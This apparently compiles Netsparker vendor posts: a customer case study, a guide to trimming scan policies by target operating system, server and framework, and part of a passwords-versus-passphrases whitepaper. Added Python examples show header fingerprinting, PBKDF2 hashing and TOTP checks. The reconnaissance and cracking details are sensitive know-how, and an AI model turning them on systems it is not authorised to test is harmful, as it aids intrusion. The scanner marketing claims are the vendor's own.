Network Intelligence is an ISO 27001 certified PCI DSS QSA, and a well-established provider of information security services and products. Established in 2001, Network Intelligence has a strong reputation of providing top notch information security consultancy, 24/7 security monitoring, and product implementation services to industry leaders both in the Asia-Pacific region as well as other parts of the globe. Their client list includes companies across several different verticals such as banking and financial services, software services, pharmaceutical, telecom, manufacturing, e-commerce, and government departments.

A Requirement to Identify All Web Application Vulnerabilities

The requirement that Network Intelligence had when it comes to web application security scanning and services was very simple: identify all web application vulnerabilities and security flaws. Easier said than done, one must note.

The Responsibilities of Web Application Security Services

Network Intelligence’s primary source of income and forte are web application security services. They do penetration tests and identify vulnerabilities and security flaws in their customers’ websites. Such a job has a lot of responsibilities; they cannot afford to miss a vulnerability because if the customer’s website is hacked, the repercussions can have catastrophic effect on their business.

Keeping Up with the Demand Whilst Delivering Top Quality Services

Even though Network Intelligence always did a meticulous job and left no stone unturned when doing a penetration test, they could not avoid automating some of the processes, especially if they wanted to keep their competitive pricing and keep up with the demand. And that is what they did early on; they have been using automated web security tools for a good number of years now, though they encountered a number of problems throughout the years which they continuously tried to address.

Most of the security tools they used were cryptic and difficult to use. Some had a better vulnerability detection rate than the others but none of them really did the job properly, not to mention that most of them reported false positives. Hence their concern was that they were spending more time getting bogged down with the configuration of the tools and verifying their results rather than doing the job and providing the customer with an affordable service and an accurate security report.

Solving the Web Application Security Problem

“Throughout the years we used a number of automated security tools but we were never really satisfied with their overall performance, hence as soon as we got to know about a new automated web application security scanner we wanted to test it to see if it can perform better than the tools we were already using,” said K. K. Mookhey, Network Intelligence’s Founder & Director. “About 4 years ago, my team brought Netsparker to my attention and we took it for a spin during a real live penetration test.  It did outperform the other established tools we were using in terms of ease of use and also web application vulnerabilities detection rate. It was a breath of fresh air. We found it to be a light, fast and reliable tool with hassle free licensing.”

Growing With Netsparker Web Application Security Scanner

Network Intelligence have been using Netsparker for over 4 years in conjunction with another tool or two, but most of the other automated tools were ditched because “Netsparker was the perfect match” says KK. Nowadays Network Intelligence scans thousands of websites and custom built web applications each year and can only keep up with the demand and detect all technical web application vulnerabilities and security flaws thanks to Netsparker’s automation.

“The exploitation engine is a very handy tool,” added Taufiq Ali, Manager (Security Assessment) at NII. “We use it to validate the issues there and then and to also show the customers the impact a vulnerability can have without having to set up a simulation in a lab."

Supporting Varieties of Web Servers and Frameworks

The web application industry is a very dynamic one; there is a wide variety of web server software to choose from, and an even wider choice when it comes to web frameworks and development languages. And the list keeps on growing every few years, if not months!

Hence with such a wide variety of customers from different verticals, Network Intelligence encounters them all; Apache, NginX, IIS, Tomcat, JAVA, PHP, .NET, JSF and many others. This was another deciding factor they had when choosing an automated tool. Could Netsparker scan all these different web applications built with different frameworks and running on a variety of web servers? Well, the answer is clear in this case study; Network Intelligence have been using Netsparker for over 4 years now.

Having a Web Application Security Expert to Rely On

As most professionals know, having good software is nothing without good support, especially in the web security industry. Things can get quite complicated and you do not want to end up with your back against the wall while working on some critical penetration test. And this is another reason why Network Intelligence stuck to Netsparker. As KK says, “the support from Ferruh and his team has always been very positive. The responses are almost prompt and always appropriate.”

About Netsparker Web Application Security Scanner

Netsparker Web Application Security Scanner is an industry leading automated web application security scanner developed by Netsparker Ltd. Netsparker management and engineers have more than a decade of experience in the web application security industry that is reflected in their product. Netsparker is a very easy to use web application security scanner that automates most of the web application security scanning. An out of the box installation of Netsparker is able to scan a wide variety of web applications, therefore web security experts, penetration testers and QA engineers do not need to spend countless hours tweaking and configuring the software. Netsparker is revolutionising web application security by being the only web application security scanner to automatically verify detected web vulnerabilities, thus reporting no false positives. Netsparker is used by world renowned companies such as Samsung, NASA, Skype, ING, ISACA and Ernst & Young.

About NII Consulting

Network Intelligence is an ISO 27001 certified PCI DSS QSA, well-established provider of information security services and products from India. Incorporated in July 2001, we have established a reputation of providing top notch information security consultancy to industry leaders both in the Asia-Pacific region as well as other parts of the globe. Our client list includes companies across verticals such as banking and financial services, software services, pharmaceutical, telecom, manufacturing, e-commerce, and government departments. Our consultants possess the requisite industry certifications, but more importantly they are equipped with a wide range of skills covering different technologies and environments.

Optimize Netsparker Scan Policies for Quicker and More Efficient Web Application Security Scans


There are many factors that can affect the efficiency and duration of a web application security scan, as explained in the article how fast is your web application security scanner. The factor that most probably has the biggest impact is the set of security and vulnerability checks that are launched during the security scan, which can be preconfigured in scan policies. For example it is much quicker to scan a web application for cross-site scripting vulnerabilities only rather than for both XSS and SQL Injection vulnerabilities.

Though under the hood things are not that simple. In reality Netsparker Web Application Security Scanner does not only check for a few well known vulnerabilities that are listed in the OWASP Top 10. It also has a number of security checks for the operating system of the web server, for the web server itself, for the web application framework and much more. This article explains how you can fine tune the Netsparker scan policies to reduce the duration of a web application security scan. You can also apply the same concepts on our online web application security scanner Netsparker Cloud. The only difference is that the interface is a bit different from the one shown below.

Why Should You Configure Security Checks in Netsparker?

The easiest way to launch a scan is to enter the URL and accept all the defaults. In a default web application security scan the All Security Checks scan policy is used. This means that the scanner will scan your website for any type of known vulnerability, irrespective of the technology your website is running on. In most cases such an approach should not be a problem, but what if you are pressed for time and have limited resources, especially in terms of hardware, server resources and bandwidth? What if you have a complex website and it is taking you too long to identify all security flaws and vulnerabilities?

In such cases you need the web application security scans to be quick, efficient and free of any possibility of disrupting the service. The best way to optimize web application security scans is to only scan your websites and web applications against threats and vulnerabilities they might actually be vulnerable to. For example if you are using Microsoft SQL Server it does not make sense to also launch MySQL server checks. After all, such checks will only consume more resources and bandwidth. Let’s dig a bit deeper into this subject and see how you can configure Netsparker to get the best out of it.

Built In Scan Policies in Netsparker

Netsparker has a number of built in scan policies that if used correctly can already give you a head start when it comes to reducing the scan duration. Below is a short introduction about each of the default scan policies:

All Security Checks

This scanning profile contains all the typical security checks. If you are not sure what type of web server and database backends are being used on the target, you can select this scan policy. This means that the target website will be scanned for all types of vulnerabilities. If you know the type of database backend being used you should select one of the below builtin scan policies which are specifically targeted to specific technologies. Therefore they consume less resources and bandwidth and take less time to complete.

All Security Checks (MS SQL)

This contains the same security and vulnerability checks as the All Security Checks scan policy but the SQL Injection checks are only for Microsoft SQL Server.

All Security Checks (MySQL)

This contains the same security and vulnerability checks as the All Security Checks scan policy but the SQL Injection checks are only for MySQL server.

All Security Checks (Oracle)

This contains the same security and vulnerability checks as the All Security Checks scan policy but the SQL Injection checks are only for Oracle database server.

All Security Checks (PostgreSQL)

This contains the same security and vulnerability checks as the All Security Checks scan policy but the SQL Injection checks are only for PostgreSQL database server.

Extensive Security Checks

This scan policy contains all the security checks included in the All Security Checks scan policy and some other attack patterns that are not too common and typically are mostly edge case scenarios. Mainly it includes extra DOM XSS vulnerability and Local File Inclusion checks. Because of the nature of such vulnerability checks, when scanning for these vulnerabilities the scan can take a considerable amount of time.

Fine Tuning Web Application Scan Policies

Although the default scan policies in Netsparker can be used to improve the efficiency of the web application security scans, you can further enhance the scans by creating your own scan policies. By fine tuning the scan policies you can also drastically reduce the time it takes to complete the security scans. To create your own scan policies you can create new policies or clone any of the existing ones as explained in Create Your Own Scan Policies with Netsparker Scan Policy Editor. Below are some examples of how you can tune your Netsparker scan policies.

Operating System Security Checks

If you know the operating system of the target web server you can switch off all the security checks for all other operating systems in the Command Injection, Command Injection (Blind) and Local File Inclusion checks groups. For example if the target web application is using Microsoft SQL Server as database backend and is running on Windows, it is recommended to:

  1. Make a clone of the default security policy All Security Checks (MS SQL)
  2. Navigate to the Command Injection checks group and disable all security checks for Linux as highlighted in the screenshot below.

Creating a new scan policy using the Netsparker Scan Policy Editor

  3. Do the same in the Command Injection (Blind) and Local File Inclusion checks groups.
  4. Once finished save the new scan policy and use it to launch your next web application security scan.

Note: Configuring your scan policy for the correct type of database server and operating system is crucial. These types of security checks make a big difference to the performance and duration of the scan, especially if the target website is big and complex. The rest of the optimizations listed below might not make a big impact but can still decrease the web application security scan time.

Scanning Custom Built Web Applications

If you will be scanning a custom built web application where no off the shelf web application such as WordPress, Drupal or Joomla is being used, disable the group Web App Fingerprinting.

Web Server Security Checks

Netsparker also contains a number of web server security checks to help users identify security issues in web servers. Therefore if you know the type of web server the target web application is running on, for example IIS, you can safely switch off all other web server security checks such as those for Apache and Nginx. You can find web server security checks in the following groups:

  • Static Resources
  • Signatures
  • Mod negotiation (this is a specific Apache security check)

Web Application Framework Security Checks

There are several different web application frameworks available such as PHP and ASP.NET. Netsparker has specific security checks for each of them, hence if you know which web application framework was used to build the target web application you can safely switch off the security checks for all other frameworks. You can find web application frameworks security checks in the following groups:

  • Remote File Inclusion (disable this group if target is not using PHP)
  • Remote Code Evaluation
  • Expression Language Injection (disable this group if target is not using JAVA)
  • RoR Code Execution (disable this group if target is not using Ruby on Rails)
  • WebDAV (disable this group if target is not using WebDAV)
  • Signatures

Other Generic Checks

If you are not familiar with the target web application we do not recommend switching off any of the generic checks, but if you are you can also consider disabling the following security checks:

  • Backup Files; checks for backup files which could be downloaded from the target
  • Common Directories; checks for typical directories in target web application that could potentially expose confidential data, such as admin portals etc
  • Signatures; several security checks for web servers and web application frameworks, such as directory listing, version disclosure etc. Browse this group for more details about each check.

Even if you have access to the web server and ability to see the listings of all the files on the target web application I recommend you to keep these checks enabled unless you desperately need to cut down the scan duration time.
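The tuning rules above all hinge on first knowing the target's stack, and on only disabling a group when the target is positively known not to use that technology. The script below is an added example, not Netsparker's own code: it infers the web server, framework and operating system from the response headers of a web application you operate, then maps that fingerprint onto the check groups named in this article. The two HTTP responses are constructed for the example, the group and policy names are the ones listed above, and the "disable Windows checks on a Linux target" case mirrors the Windows case described above as an assumption.

```python
# Added example (not Netsparker's code): derive scan policy trims from what
# a target's own HTTP response headers reveal. Header names are standard;
# the sample responses below are constructed for this example.

# Constructed sample: ASP.NET on IIS (and therefore Windows).
SAMPLE_HEADERS = """HTTP/1.1 200 OK
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=abc123; path=/; HttpOnly
Content-Type: text/html; charset=utf-8
"""

# Constructed sample: PHP behind nginx, operating system not determinable.
SAMPLE_HEADERS_PHP = """HTTP/1.1 200 OK
Server: nginx/1.18.0
X-Powered-By: PHP/7.4.3
Set-Cookie: PHPSESSID=deadbeef; path=/
"""


def parse_headers(raw):
    """Parse a raw HTTP response head into {lowercase-name: [values]}."""
    headers = {}
    for line in raw.splitlines()[1:]:          # skip the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def fingerprint(headers):
    """Guess web server, framework and OS; None where nothing is conclusive."""
    fp = {"web_server": None, "framework": None, "os": None}
    server = " ".join(headers.get("server", [])).lower()
    powered = " ".join(headers.get("x-powered-by", [])).lower()
    cookies = " ".join(headers.get("set-cookie", [])).lower()

    if "microsoft-iis" in server:
        fp["web_server"], fp["os"] = "IIS", "Windows"   # IIS only runs on Windows
    elif "nginx" in server:
        fp["web_server"] = "Nginx"                      # OS stays unknown
    elif "apache" in server:
        fp["web_server"] = "Apache"

    if "asp.net" in powered or "x-aspnet-version" in headers or "asp.net_sessionid" in cookies:
        fp["framework"] = "ASP.NET"
    elif "php" in powered or "phpsessid" in cookies:
        fp["framework"] = "PHP"
    elif "jsessionid" in cookies:
        fp["framework"] = "Java"
    return fp


# Groups the article ties to one framework: disable only when the target is
# positively known to use a different framework.
FRAMEWORK_GROUPS = {
    "Remote File Inclusion": "PHP",
    "Expression Language Injection": "Java",
    "RoR Code Execution": "Ruby on Rails",
}
# Groups whose OS-specific checks can be trimmed (article: disable the Linux
# checks on a Windows target; the Linux case mirrors that, an assumption).
OS_SPECIFIC_GROUPS = ("Command Injection", "Command Injection (Blind)", "Local File Inclusion")
BASE_POLICY = {
    "MS SQL": "All Security Checks (MS SQL)",
    "MySQL": "All Security Checks (MySQL)",
    "Oracle": "All Security Checks (Oracle)",
    "PostgreSQL": "All Security Checks (PostgreSQL)",
}


def policy_adjustments(fp, database=None, custom_built=False):
    """Return (base policy to clone, groups to disable, per-group check trims).

    Anything not positively identified stays enabled: an unknown stack gets
    the full All Security Checks policy untouched.
    """
    base = BASE_POLICY.get(database, "All Security Checks")
    groups, trims = set(), {}
    if fp["framework"] is not None:
        groups.update(g for g, needs in FRAMEWORK_GROUPS.items() if fp["framework"] != needs)
    if fp["web_server"] is not None and fp["web_server"] != "Apache":
        groups.add("Mod negotiation")          # Apache-specific check
    if fp["os"] in ("Windows", "Linux"):
        other = "Linux" if fp["os"] == "Windows" else "Windows"
        trims = {g: f"disable {other} checks" for g in OS_SPECIFIC_GROUPS}
    if custom_built:
        groups.add("Web App Fingerprinting")   # no WordPress/Drupal/Joomla in play
    return base, groups, trims


if __name__ == "__main__":
    fp = fingerprint(parse_headers(SAMPLE_HEADERS))
    print(fp)
    print(policy_adjustments(fp, database="MS SQL", custom_built=True))
```

The database backend is not visible in headers, so it is passed in explicitly; the script deliberately leaves every group enabled whenever a component of the stack could not be identified, which is the conservative choice the article recommends for unfamiliar targets.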

The Need to Optimize Web Application Security Scans

With just a bit of homework you can easily optimize the scan policies to benefit from quicker and more efficient web application security scans. If you compare the time it takes you to identify the operating system, web server, database backend and web application framework of a target web application to the time it takes for the scanner to complete all the security checks, you will find out that the latter takes much longer.

Hence I recommend spending those five or ten minutes fine tuning the scan policies before scanning a new web application. And since you can save the scan policies, there is no need to repeat this procedure each time you scan a web application, because you can have a scan policy for each web application you are scanning.

Passwords vs. Pass Phrases – Innovation and Evolution


This whitepaper is part of a three-part installment covering a wide breadth of topics on passwords, security, next-generation, and plenty more. In this installment, we close the series with a look at the psychology of authentication itself, the latest generation of authentication, and modern applications. If you haven't read the first two installments, the links are: Passwords vs. Pass Phrases - An Ideological Divide and Passwords vs. Pass Phrases – Weaknesses Beyond the Password.

Preface

At the start of this series, we looked at several factors that weaken password-based authentication security, namely on the side of the end-user.  The concept of a password in and of itself is inherently flawed, and many of the surrounding security or enforcement strategies are equally flawed and antiquated.  By forcing this behavior on end users, content providers instill insecure authentication concepts in them, reinforced by the problem of a password itself.  In the second article, we explored that problem, reviewing how the ideology of a password is insecure, due to closing the end-user’s focus on a poor concept.  We continued on to exemplify how a simple restructuring of the password concept into pass phrases has a potentially revolutionary effect, most especially in web application security.  There are, however, those who have radically different ideas, and this article focuses on those and their potential applications.

Indeed, as we mentioned in the last article, “password-based authentication need not be such an archaic pillar of security any longer.”  The concept of a prompt-and-response authentication mechanism has been in existence since the Hellenistic Period, approximately 200 B.C., where Roman soldiers employed the use of watchwords – a memorized word repeated to an authenticator to prove identity.  The general concept remained the same for millennia, including its first use in computing with the 1961 Massachusetts Institute of Technology Compatible Time-Sharing System (MIT CTSS).  As one of the first time sharing computational systems, users of the system had authentication mechanisms to differentiate and privatize each point of entry terminal, capable even of accommodating multiple researchers at once.  Fast forward to today, and over 50 years later we have experienced the most unfathomable, unimaginable rapid evolution of technology – exploding from unaffordable and disconnected-from-the-world personal computers to a wireless, always-communicating computer in everyone’s pocket in just 10 short years.  And yet we still use the same authentication concept that has not changed since Polybius scribed about it in 150 B.C. and MIT implemented it in the CTSS (Compatible Time Sharing Systems).

Comfort Zone: Why We Use Ancient Concepts in a Modern Era

The concept of a password has indeed been around for millennia, but in terms of computing, the concept has remained relatively unchanged since authentication was first implemented and required in computing structures. We still focus on simplistic concepts of authentication – a piece of (sometimes) public data, and a piece of private data, commonly in the form of a username and password combination – which have remained stable and constant since the 1961 MIT CTSS. For quite some time now it has been a long-standing joke as to why a maximum password length exists, especially to this day. And, as is part of the joke, no one really knows why anyone still enforces a maximum length beyond the disappointing but often default answer: “It just has always been this way.” Such is seemingly the concept for username and password authentication itself. It just always has been this way, why change anything?

Much in life stays the same for long periods.  For millennia, society operated in nearly all facets of living very lackadaisically and without regard to improvement.  It sometimes takes decades or even centuries for a way of life to change from the norm.  “It’s always been this way” seems to be the common retort through time.  But we now live in an enlightened society of rich culture and liberties; of information zipping through the skies and giant fiber cables under the oceans; of a connected society where wireless internet devices outnumber their human users; of a time where new, revolutionary ideas are borne of brilliant minds, are fostered and explode into fortunes, and die all in less than a decade.  Thus, as we evolve from exceedingly limited connectivity to the most connected society in just 20 short years, so too do our technologies that propel us at near-immeasurable speed: cumbersome landlines to only cell phones, dialup to nationwide broadband, MySpace to Facebook to Twitter and all the social media in between.  We as a now rapidly and digitally evolving society must continue the trend of eschewing what “has always been this way,” and prepare for the evolution of web and other authentication mechanisms.

We Just Discussed Pass Phrases, What Happened to That?

Of course, passphrases are an incredible and delightfully simple step up in the evolution of authentication mechanisms – a concept we detail extensively and, of course, still support in the first installment of this series.  The concept of an obfuscated jumble of letters, numbers, and sometimes special characters in a non-sentence or phrase-like structure leads to very limited and measurably weak password security.  “In order to memorize this ideology of minimum 8 and maximum 32 characters, I have to make a jumbled mess that I can remember,” is often the train of thought that rushes through an end-user’s mind.  This concept yields passwords so weakened, their content can be cracked remarkably easily and swiftly in offline compromised password database cracks.

The use of a passphrase in lieu of a password is still of course a quite highly recommended solution, but only for as long as a username/password authentication combination remains.  Eventually, a newer, more permanent solution will need to replace this protocol.  Indeed, it is remarkable that the concept of a password has stuck around for so long, especially in the oceanic ether of highly dynamic and ever changing web trends.  The concept of a password has gone relatively unchanged, save for some additional length requirements, even in spite of the unending flow of compromises that occur and the enormous losses they yield all due at least in part to password-based authentication.

Some estimates claim over ten million debit and credit card numbers are involved in mass compromises every year, resulting in tens of billions of dollars lost due to fraud. (We visit this topic extensively in our PCI Compliance article series.) A surprisingly large amount of this is the result of compromised financial data via online services, quite often due to a compromise of password database hashes. Some password hash brute forcing software has the potential to yield several thousand user passwords an hour on some of the largest password hash dumps – over ten million cryptographic password hashes compromised from Comcast, Yahoo!, and AOL just this year alone. Among internet users who authenticate to multiple websites, the majority use the same password across multiple websites. This has been observed from the passwords cracked and successfully attempted on other websites by black-hat hackers during Pastebin’ed database compromises, like RockYou, where thirty million accounts were compromised with all passwords stored in plaintext – no cryptographic hashing whatsoever. If just a small percentage of those compromised accounts use the same passwords for their PayPal or online banking logins, that still may result in hundreds of thousands, if not millions, in potential loss to fraud.

This all stems from the fact that password hashing, regardless of whether passwords or passphrases are used, is still only a one-way cryptographic hashing algorithm. There was once a time not at all long ago when it was still believed that fast cryptographic hashing algorithms – MD5, SHA1, etc. – were impenetrable enough and reasonably secure for the foreseeable future. That quickly changed with newer technology and the speed at which modern graphical processing units (GPUs) chug through linear algebra. With this almost absurd and astronomical rate of technology evolution over the past ten years, it stands to reason that even if we utilize some new, strong cryptographic hashing function with 20-plus character passphrases, it could be very soon that technology advances with the capability to crack it in mere hours. This has become a near axiom of the cryptographic world: the world of password cracking is catching up to the world of cryptography at a frightening and alarming rate. This is because all a computer has to do is successfully guess the contents of a password hash. There is no data encoding and decoding procedure, no two-way handshake, or any real security mechanism for password hashing. For something as indescribably crucial as account authentication mechanisms – something that should receive the utmost attention and scrutiny on security but sadly often does not – we utilize a remarkably weak and archaic system to protect sometimes the most confidential of data, all because of bad psychology.
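The paragraph above makes two distinct points about offline cracking: a fast hash costs the attacker almost nothing per guess, and an unsalted hash lets identical passwords be recognised across a whole dump. The script below is an added example, not part of the whitepaper, showing both effects side by side with the Python standard library: unsalted SHA-1 as found in many leaked databases, and a salted PBKDF2-HMAC-SHA256 store with a configurable work factor. The iteration count and the sample passwords are assumptions constructed for the example.

```python
# Added example (not from the whitepaper): what a fast, unsalted hash gives
# away and what a slow, salted KDF changes. Standard library only.
import hashlib
import hmac
import os
import time

# Assumption: a work factor chosen so one verification costs a noticeable
# fraction of a second on the server; it should be raised as hardware speeds up.
PBKDF2_ITERATIONS = 200_000


def fast_hash(password):
    """Unsalted SHA-1, the kind of 'fast' hash found in many leaked dumps."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256, stored as 'iterations$salt_hex$dk_hex'
    so the parameters travel with the hash and can be raised later."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return f"{PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iterations; constant-time compare."""
    iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def identical_passwords_visible(hashes):
    """True if two users with the same password share a stored hash.
    An unsalted scheme leaks this to anyone holding the dump; a salted one does not."""
    return len(set(hashes)) < len(hashes)


def seconds_per_guess(hash_fn, samples=5):
    """Average wall-clock cost of one guess for a given hash function."""
    start = time.perf_counter()
    for i in range(samples):
        hash_fn(f"guess{i}")
    return (time.perf_counter() - start) / samples


def slowdown_factor():
    """How many times costlier one PBKDF2 guess is than one SHA-1 guess."""
    fixed_salt = b"\x00" * 16          # fixed so only the KDF cost is measured
    slow = seconds_per_guess(lambda p: hash_password(p, fixed_salt))
    fast = seconds_per_guess(fast_hash, samples=1000)
    return slow / fast


if __name__ == "__main__":
    # Constructed sample: two users who chose the same weak password.
    users = ["123456", "123456", "correct horse battery staple"]
    print("unsalted SHA-1 reveals shared passwords:",
          identical_passwords_visible([fast_hash(p) for p in users]))
    print("salted PBKDF2 reveals shared passwords:",
          identical_passwords_visible([hash_password(p) for p in users]))
    print(f"one PBKDF2 guess costs ~{slowdown_factor():,.0f}x one SHA-1 guess")
```

The point of storing the iteration count with each hash is the one the paragraph raises: when hardware catches up, the work factor can be increased for new and re-verified passwords without breaking existing records. The measured slowdown is per guess on one CPU core; a GPU narrows the absolute times but the ratio between a fast hash and a deliberately slow KDF is what the defender controls.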

Passwords: Satisfaction from Pseudo-Security

Psychology is defined as the study of mental functions and behaviors, but some have mused it is more a practice, perhaps an obsession ;) , of defining and naming each function and behavior. The study of the mind is indeed mysterious in attempting to make sense of the wild phenomena that do not fit comfortably with rationality or logic. Through nearly every walk of life, humans perform acts of cognitive bias – actions or ways of thought that inhibit us from making rational and logic-driven decisions. In some cases, such as instinctual behavior, it may in fact have life saving benefits. However, bias often drives a person to operate in a subjective way they often know is illogical, but do so regardless due to functionality heuristics, social influence, or immediate gratification. In terms of password-based authentication, one could argue that would be the direct influence to utilize allowably weak passwords (and the concept of a password altogether), commonality of a password authentication mechanism across all online authentication portals, and utilizing cheaply memorizable passwords we know are weak at the cost of immediately bypassing the login restriction.

For over a decade and through the largest, most explosive growth in web systems, we have known our passwords are weak.  In 2006, a study of students showed many used insecure passwords despite knowing the security risks, only to have the ease of memorization.  As the study summarizes, many users employed the use of weak passwords, consisting of “lower case letters, numbers or digits, personally meaningful numbers and personally meaningful words when creating passwords, despite the fact that they realize that these methods may not be the most secure.”  In fact, passwords in general are largely psychological in nature.  Going further back, in 2002 a British psychologist, Dr. Helen Petrie, proclaimed passwords reveal largely psychological information about the user – childhood nicknames or pet names, familial information, and symbolic events headline the list.  Even to this day we hypothesize psychological reward systems for password security.  And, indeed, a simple scan of the contents of the RockYou database, and other brute-forced password hash compromises, shows these habits to still be true, over a decade later.  But the reality is that password-style authentication’s value lies solely in its psychology, not its security.
 
In 2010, two computer security researchers at Cambridge University – Joseph Bonneau and Sören Preibusch – released a study after analyzing over 150 news, e-commerce, social networking, and various other websites, all offering free accounts utilizing password-based authentication systems.  In their study, they, too, suggest that many websites utilize passwords “primarily for psychological reasons.”  They refer to the two primary purposes of such an authentication schema.  First, that the data collection and requirements process during enrollment are largely just to procure “marketing data,” a now normalized psychological transaction we perform as a sort of digital barter for ‘free’ information trade – you get content, advertisers get to learn about you, data for data.  Additionally and most definitively, however, they speculate that password systems exist largely as a “way to build trusted relationships” with end users.  However, they also suggest attempts to replace password authentication systems with more secure and modern mechanisms may fail because they do not reproduce the “entrenched ritual” of password-based authentication mechanisms.

There are indeed those who believe passwords are ultimately an invariable and solidified mechanism of authentication, an unbreakable pillar of e-society.  Even Microsoft acknowledged recently that weak passwords are a measurably acceptable risk if the account it protects yields low-value data (e.g. a website like RockYou where only social media game scores are stored, as opposed to an online bank account).  But these are absurd notions … mostly.  Of course, Slate’s Will Oremus is unarguably correct in some of his observations—the affordability of privacy and anonymity with a username/password authentication system is critical, especially in light of recent privacy concerns over spying and more; and the fact that password authentication will never truly die.  But using weak passwords where the risk is “acceptable” is a very bad judgment call.  By whose measure is the risk acceptable?  How do you proactively teach and ingrain into users the understanding of this acceptable risk and what a reasonable threshold is?  What happens if that “acceptable risk” website later decides to expand and house higher value private data?  These questions are minimally and ineffectively answered, if at all, and – this is the most crucial part – its success all rests squarely on the effectiveness of end-users not using the same password on multiple websites, a problem that has persisted for decades, if not since the dawn of online authentication systems.  And with events like the recent Russian compromise of over one billion passwords, the likelihood of compromising a critical account due to a weak password used elsewhere grows exponentially larger literally every day.

Regardless, Bonneau and Preibusch are perhaps quite right in a number of their observations, specifically the trusted relationship built by the psychologically entrenched ritual of username and password authentication, still held onto firmly by its actors and participants – the web and other systems that employ them, and the end users who happily participate.  The user provides personal, fiscally valuable data in exchange for ‘exclusivity’ or niche service, solidifying the consummation of the accord between the two parties by an authentication schema.  One could reasonably assume any authentication system—password-based or otherwise—would yield the same or similar trusted bond between content provider and end user, but as Bonneau and Preibusch also wisely speculated, newer and more secure authentication systems will meet heavy resistance.  In fact, some data suggests habit and belief are often doubled down on when challenged with better alternatives—even alternatives with considerable evidentiary support to the contrary of the held belief—which in and of itself would suggest considerable potential resistance to new authentication mechanisms.  Users have held so firmly onto this method for such a very long time that upsetting the foundation of their psychologically entrenched ritual seems implausible.  But, surprisingly, it is not implausible at all.  That resistance has already been met and bested by many remarkable new technologies.  The aforementioned Cambridge study was released in 2010, and in just the four short years since we have witnessed some radical changes in authentication.

If Not Passwords, Then What Shall We Use?

As we mentioned at the start, wireless devices currently outnumber living human beings.  In fact, one estimate claims that by 2020 wireless devices will outnumber humans six to one – approaching 25 billion connected devices.  It is highly probable that nearly every human who holds some form of account somewhere that utilizes an authentication system – likely, of course, password-based – also possesses a wireless device, most likely a cellular phone.  These devices offer an additional layer to authentication systems, a mechanism often referred to as two-factor or multi-factor authentication.  In standard password-style authentication, the action performed is a one-factor authentication – the username and password you provide are the only asset utilized.  A two-factor authentication system continues this process by confirming this authentication (first factor), then looking up your second authentication system (second factor, in many cases a cell phone or security token dongle) and challenging the user for a code produced exclusively by that device.  The concept behind two-factor authentication is that only you, the actual owner of the account, should be in possession of that second asset.  Assuming the sanctity of all secret data – such as those assets’ private keys – is retained, the system is purportedly impenetrable.  This additional method on top of password-based authentication has long been employed in many high-risk applications, such as government applications, online banking, and recently even online gaming.
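
The first-factor/second-factor exchange described above, as an added example that is not part of the original article: the server-side piece that checks a code “produced exclusively by that device”.  It assumes the device and the server share a secret and derive codes from it as specified in RFC 4226 (HOTP) and RFC 6238 (TOTP).  The key used is the RFCs’ published test key so the output can be checked against the standards; the verifier class, its drift window and its replay rule are assumptions of this example, not any vendor’s implementation.

```python
import hashlib
import hmac
import struct
import time
from typing import Optional

# Added example, not from the original article. The shared secret below is the
# RFC 4226 / RFC 6238 test-vector key, used only so results are checkable.
TEST_SECRET = b"12345678901234567890"
TIME_STEP = 30  # seconds per TOTP window


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HMAC-based one-time password (RFC 4226) over an 8-byte big-endian counter."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F  # dynamic truncation: low nibble of last byte
    code = ((mac[offset] & 0x7F) << 24
            | mac[offset + 1] << 16
            | mac[offset + 2] << 8
            | mac[offset + 3])
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, unix_time: int, digits: int = 6, step: int = TIME_STEP) -> str:
    """Time-based one-time password (RFC 6238): HOTP over the time-step counter."""
    return hotp(secret, unix_time // step, digits)


class SecondFactorVerifier:
    """Checks the code submitted for the second factor (assumed design).

    Tolerates +/- `drift` time steps of clock skew between device and server,
    and never accepts a time step at or before the last accepted one, so a
    code that was already used cannot be replayed inside its validity window.
    """

    def __init__(self, secret: bytes, digits: int = 6,
                 step: int = TIME_STEP, drift: int = 1):
        self.secret = secret
        self.digits = digits
        self.step = step
        self.drift = drift
        self.last_accepted_counter = -1

    def verify(self, submitted: str, now: Optional[int] = None) -> bool:
        now = int(time.time()) if now is None else now
        counter = now // self.step
        for candidate in range(counter - self.drift, counter + self.drift + 1):
            if candidate <= self.last_accepted_counter:
                continue  # window already consumed: treat as a replay
            expected = hotp(self.secret, candidate, self.digits)
            if hmac.compare_digest(expected, submitted):  # constant-time compare
                self.last_accepted_counter = candidate
                return True
        return False


if __name__ == "__main__":
    # RFC 6238 vector: at T=59 the 8-digit SHA-1 TOTP is 94287082
    print(totp(TEST_SECRET, 59, digits=8))
    verifier = SecondFactorVerifier(TEST_SECRET, digits=8)
    print(verifier.verify("94287082", now=59))  # first use: accepted
    print(verifier.verify("94287082", now=59))  # same code again: rejected
```

With a 30-second step and a drift of one window the server accepts a code for roughly a minute and a half in total, which is the usual trade-off between usability and exposure.  The replay rule is what makes the “only the owner of that device” assumption hold for the lifetime of a single code.  Note that the shared secret deserves the same protection as the password hash it sits next to: whoever holds it can generate valid codes, which is the “sanctity of all secret data” condition the paragraph above places on the whole scheme.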

